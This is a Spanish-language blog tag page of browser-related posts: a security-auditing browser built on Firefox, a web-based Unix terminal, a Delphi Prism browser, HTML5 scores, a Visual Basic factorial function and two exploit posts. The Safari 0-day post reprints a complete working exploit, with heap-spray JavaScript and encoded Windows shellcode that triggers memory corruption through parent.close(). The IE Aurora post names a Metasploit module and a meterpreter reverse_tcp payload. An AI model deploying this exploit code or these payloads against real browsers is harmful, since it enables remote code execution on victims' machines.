Entradas etiquetadas con Navegador

Mantra

Mantra: navegador para auditorías de seguridad

23 jun

Publicado por WindHack en Inseguridad Informática

No hay comentarios

Mantra es un navegador cuyo objetivo es ser una herramienta primordial para las auditorías de seguridad. Está basado en Mozilla Firefox, y es una compilación personalizada, de versión portable, fácil uso y totalmente configurable. Se encuentra disponible para los sistemas operativos GNU/Linux, Windows y MacOS.

En su versión actual, han decidido unir su proyecto con FireCAT, el cual es un conjunto de extensiones clasificadas y bien organizadas sobre auditoría en seguridad.

Ahora Mantra cuenta con las siguientes herramientas:

  • Information Gathering
    • Whois
      • Flagfox
    • Location Info
      • Flagfox
    • Enumeration and Fingerprint
      • Host Spy
      • JSView
      • PassiveRecon
      • View Dependencies
      • Wappalyzer
    • Data Mining
      • People Search Engine
      • Facebook search
  • Editors
    • Cert Viewer Plus
    • Firebug
    • JSView
  • Network Utilities
    • Protocols and applications
      • FTP
        • Fire FTP
      • DNS
        • DNS Cache
      • SQL
        • SQLite Manager
    • Sniffers
      • HTTP Fox
    • Password
      • CryptoFox 2.0
  • Misc
    • Tweaks and Hacks
      • Greasemonkey
      • Scripts
    • Malware scanner
      • Web of Trust
    • Automation
      • iMacros
    • Others
      • CacheToggle 0.6
      • URL Flipper
  • Application Auditing
    • Hackbar
    • JavaScript Deobfuscator
    • RESTClient
    • Tamper Data
    • Live HTTP Headers
    • RefControl
    • User Agent Switcher
    • Web Developer
    • DOM Inspector
    • Inspect This
    • Formfox
    • Exploit Me
      • Access Me
      • SQL Inject Me
      • XSS Me
    • Cookies
      • Cookies Manager+ 1.5.1
      • Firecookie
  • Proxy
    • FoxyProxy Standard 2.22.6
    • HttpFox

Descargar (Beta 0.61)

Para obtener más información puedes visitar la página oficial de Mantra.

Más >
Shell

Unix-Shell desde nuestro navegador: Terminal Virtual

20 feb

Publicado por WindHack en GNU/Linux

2 comentarios

Navegando por la Inet, me encontré con este interesante sitio. Pues bien, lo que le hace llamativo es que, en él podemos practicar un poco con los comandos básicos de Unix directamente desde nuestro navegador, semejando una Terminal ( Consola ).

Nunca había visto nada parecido, y a mi parecer es una manera entretenida y divertida de aprender a manejar la consola sin correr riesgos. Obviamente no están disponibles muchos comandos pero sí podremos experimentar con algunos muy usados.,

Para visitar la «Terminal virtual»: CB.VU

DaGiMe Explorer

Navegador Web en Delphi Prism

4 jun

Publicado por WindHack en Delphi/Pascal

No hay comentarios

Delphi Prism es la versión de Delphi para plataformas .NET. Como aprendizaje he creado un navegador web en esta plataforma, obviamente usando el componente WebBrowser y por ende el motor de renderizado Trident.

El navegador se llama DaGiMe Explorer. Permite abrir archivos mediante el protocolo file:///, guardar una página web, y las características de navegación comunes.

Sencillo, pero ideal para entender un poco este nuevo lenguaje.

Descarga (Incluye código fuente).

security-medium

0-Day en el navegador web Safari

13 may

Publicado por WindHack en Inseguridad Informática

1 comentario

Una empresa holandesa, Secunia, ha detectado un fallo crítico en el navegador Safari que permite ejecutar código malicioso. Éste fue detectado en la versión 4.5 del navegador, y corriendo en Windows 7, aunque no se descarta que pueda ocurrir en otras versiones y en Mac.

Al parecer, el problema puede provenir de la apertura de las nuevas ventanas, pues en el momento de cerrar el pop up, si éste viene de páginas o correos en HTML malicioso, se abre inequívocamente la puerta a la instalación y ejecución de malware.

De momento, Apple no ha confirmado nada, por lo que no se ha lanzado ningún parche de seguridad. Sin embargo, los expertos recomiendan tener cuidado con los mensajes que se abren vía webmail e inhabilitar el javascript de aquellas páginas que no nos creen mucha confianza.

Exploit:

<!--
Apple Safari 4.0.5 parent.close() (memory corruption) 0day Code Execution Exploit
Bug discovered by Krystian Kloskowski (h07) &lt;h07@interia.pl&gt;
Tested on: Apple Safari 4.0.5 / XP SP2 Polish
Shellcode: Windows Execute Command (calc)
Local: Yes
Remote: Yes (POPUP must be enabled [Ctrl+Shift+K])
Just for fun ;)
-->
 
<!---------------------------------REMOTE.htm--------------------------------->
<script>
window.open("0day.htm"); //parent.close() activation
self.close();
</script>
-----------------------------------REMOTE.htm-------------------------------->
 
<!---------------------------------0day.htm---------------------------------->
<h1>Alt + F4 :)</h1>
 
<script>
function make_buf(payload, len) {
    while(payload.length &lt; (len * 2)) payload += payload;
    payload = payload.substring(0, len);
    return payload;
}
 
var shellcode = unescape("%u9090%u9090"+ //Windows Execute Command (calc)
"%ue8fc%u0044%u0000%u458b%u8b3c%u057c%u0178%u8bef%u184f%u5f8b"+
"%u0120%u49eb%u348b%u018b%u31ee%u99c0%u84ac%u74c0%uc107%u0dca"+
"%uc201%uf4eb%u543b%u0424%ue575%u5f8b%u0124%u66eb%u0c8b%u8b4b"+
"%u1c5f%ueb01%u1c8b%u018b%u89eb%u245c%uc304%uc031%u8b64%u3040"+
"%uc085%u0c78%u408b%u8b0c%u1c70%u8bad%u0868%u09eb%u808b%u00b0"+
"%u0000%u688b%u5f3c%uf631%u5660%uf889%uc083%u507b%uf068%u048a"+
"%u685f%ufe98%u0e8a%uff57%u63e7%u6c61%u0063");
 
 
bigblock = unescape("%u0D0D%u0D0D");
headersize = 20;
slackspace = headersize+shellcode.length
while (bigblock.length&lt;slackspace) bigblock+=bigblock;
fillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length-slackspace);
while(block.length+slackspace&lt;0x40000) block = block+block+fillblock;
memory = new Array();
for (i=0;i&lt;1000;i++) memory[i] = block + shellcode;
 
var a = parent;
var buf = make_buf("AAAA", 10000);
 
for(var i = 0; i &lt;= 1; i++) {
    a.prompt(alert);
    a.prompt(buf);
    a.close();
}
</script>
<!---------------------------------0day.htm---------------------------------->
Más >
IE

Explotando IE Aurora {Metasploit}

16 abr

Publicado por WindHack en Inseguridad Informática

2 comentarios

Hace algunos meses McAfee publicó la información sobre la tan nombrada y peligrosa “Operación Aurora“. Así es, pues se descubrió una vulnerabilidad 0-day en el navegador web de MicrosoftInternet Explorer (IE)“. El cual por medio de un exploit permitía remotamente ejecutar código arbitrario desencadenando así un volcado de memoria permitiendo al atacante remoto acceder completamente al sistema afectado.

Son vulnerables: Navegadores: Internet Explorer 6, Internet Explore 7, Internet Explorer 8 Sistemas Operativos: Windows 2000 SP4, Windows XP, Windows Server 2003, Windows Vista, Windows Server 2008, Windows 7 y Windows Server 2008 R2.

Para demostrar la peligrosidad de éste exploit he decidido hacer un vídeo en el cual exploto el fallo:

Datos técnicos:

Sistema Operativo de la PC afectada: Windows XP SP2 x86 Navegador: Internet Explorer 6 Sistema Operativo Atacante: Ubuntu 9.04 + Metasploit Exploit Usado: windows/browser/ie_aurora Payload Usado: windows/meterpreter/reverse_tcp

Esta vulnerabilidad es algo antigua, y según he leído el parche para solucionar el error ya ha salido; de todas formas, muchas personas no han actualizado su sistema. Así que si no quieres ser víctima de este ataque, que sin olvidar afecto a más de 20 compañías a nivel mundial lo más adecuado es descargar la “solución” por medio de Windows Update.

Saludos,

Más >
Google-chrome

Chrome lidera con nota la compatibilidad con HTML5

13 abr

Publicado por WindHack en Noticias

No hay comentarios

El navegador de Google lidera la clasificación de navegadores en cuanto a compatibilidad con el estándar HTML5 propuesto por W3C y que será estándar oficial en 2012.

La página html5test.com ha puesto a disposición de cualquiera una serie de tests que ponen a prueba las capacidades HTML5 de los navegadores actuales, incluyendo Canvas, geolocalización, etiqueta vídeo, etcétera.

La puntuación se da en un baremo de hasta 160 y Chrome rinde 137 puntos seguido de cerca por Safari con 113 y Opera y Firefox con 102 y 101 respectivamente. ¿A alguien le sorprende que Internet Explorer 8 e incluso Internet Explorer 9 Preview obtengan sólo 19 puntos de 160 posibles?.

Visto en: http://www.theinquirer.es/2010/04/13/chrome-lidera-con-nota-la-compatibilidad-con-html5.html

Una vez más Internet Explorer nos demuestra su gran “eficiencia” ¿No?.

Saludos,

Factorial

Calcular el factorial de un número

4 abr

Publicado por WindHack en Programación

No hay comentarios

Bueno, aclararles que no soy para nada un fan de VB, y tampoco es que me la lleve muy bien con él, pero en fin…Cuando toca hacer trabajos o actividades en determinado lenguaje no queda más alternativa ¿no?.

Esta función hace poco la expuse aquí en ObjectPascal, ahora hice una traducción a Visual Basic, un poco tosca pero es lo que hay, xD.

' ---------------------------------------
'|---------- Función Factorial ----------|
'|-- Calcula el factorial de un número --|
'|--------- Autor: .:WindHack:. ---------|
'|-- Sitio Web: http://daw-labs.com ---|
' ---------------------------------------
Public Function Factorial(Num As Double) As String
Dim I As Integer
  If Num &gt;= 170 Then
      Factorial = "Numero Infinito..."
  Else
    For I = 1 To Num - 1
      Num = Num * I
      Factorial = Num
    Next
End If
End Function

Con “recursividad”:

Public Function FactorialR(Num As DoubleAs Currency
If (Num > 0) Then
   FactorialR = Num * FactorialR(Num - 1)
Else
   FactorialR = 1
End If
End Function

Saludos,